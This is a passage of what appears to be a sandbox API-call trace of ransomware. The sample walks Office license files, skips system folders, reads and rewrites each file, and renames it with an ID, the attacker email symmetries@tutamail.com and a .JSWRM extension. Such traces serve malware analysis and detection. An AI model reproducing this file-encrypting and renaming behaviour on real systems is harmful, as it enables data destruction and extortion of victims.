lpMultiByteStr="AccessR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0102.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0102.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Grace-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0102.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Grace-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2412b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0102.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0102.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0102.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0102.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0102.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.450] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20775) returned 1 [0102.450] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0102.451] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0102.454] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.454] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0102.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.454] CloseHandle (hObject=0x45c) returned 1 [0102.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0102.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0102.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0102.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0102.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0102.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0102.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.455] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0102.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0102.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0102.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0102.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0102.464] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe274684a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe274684a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe289dd92, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_Grace-ul-oob.xrm-ms", cAlternateFileName="ACCESS~2.XRM")) returned 1 [0102.464] lstrcmpiW (lpString1="AccessR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.464] lstrcmpiW (lpString1="AccessR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.464] lstrcmpiW (lpString1="AccessR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.464] lstrcmpiW (lpString1="AccessR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.464] lstrcmpiW (lpString1="AccessR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.464] lstrcmpiW (lpString1="AccessR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.464] lstrcmpiW (lpString1="AccessR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned -1 [0102.464] lstrcmpiW (lpString1="AccessR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.464] lstrcmpiW (lpString1="AccessR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.464] lstrcmpiW (lpString1="AccessR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Grace-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0102.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Grace-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240f70, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0102.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Grace-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0102.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Grace-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2411c8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0102.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0102.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0102.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0102.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.465] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11594) returned 1 [0102.465] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0102.466] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0102.475] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.475] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0102.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.476] CloseHandle (hObject=0x45c) returned 1 [0102.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0102.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0102.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0102.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0102.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0102.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0102.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.476] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0102.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0102.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0102.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0102.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0102.481] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe274684a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe274684a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe28c3fe1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_OEM_Perp-pl.xrm-ms", cAlternateFileName="ACCESS~1.XRM")) returned 1 [0102.481] lstrcmpiW (lpString1="AccessR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0102.481] lstrcmpiW (lpString1="AccessR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0102.481] lstrcmpiW (lpString1="AccessR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0102.481] lstrcmpiW (lpString1="AccessR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0102.481] lstrcmpiW (lpString1="AccessR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0102.481] lstrcmpiW (lpString1="AccessR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.481] lstrcmpiW (lpString1="AccessR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned -1 [0102.481] lstrcmpiW (lpString1="AccessR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.481] lstrcmpiW (lpString1="AccessR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.481] lstrcmpiW (lpString1="AccessR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned -1 [0102.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0102.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0102.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0102.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240ef8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0102.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0102.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0102.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.482] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10639) returned 1 [0102.482] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0102.482] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0102.484] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.484] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0102.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.484] CloseHandle (hObject=0x45c) returned 1 [0102.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0102.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0102.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0102.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0102.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0102.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0102.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.485] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0102.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0102.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0102.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0102.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.486] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2d3c6cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2d3c6cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2f5281c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="AC6D20~1.XRM")) returned 1 [0102.486] lstrcmpiW (lpString1="AccessR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0102.486] lstrcmpiW (lpString1="AccessR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0102.486] lstrcmpiW (lpString1="AccessR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0102.486] lstrcmpiW (lpString1="AccessR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0102.486] lstrcmpiW (lpString1="AccessR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.486] lstrcmpiW (lpString1="AccessR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.486] lstrcmpiW (lpString1="AccessR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned -1 [0102.486] lstrcmpiW (lpString1="AccessR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.486] lstrcmpiW (lpString1="AccessR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.486] lstrcmpiW (lpString1="AccessR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0102.486] WideCharToMultiByte (in: 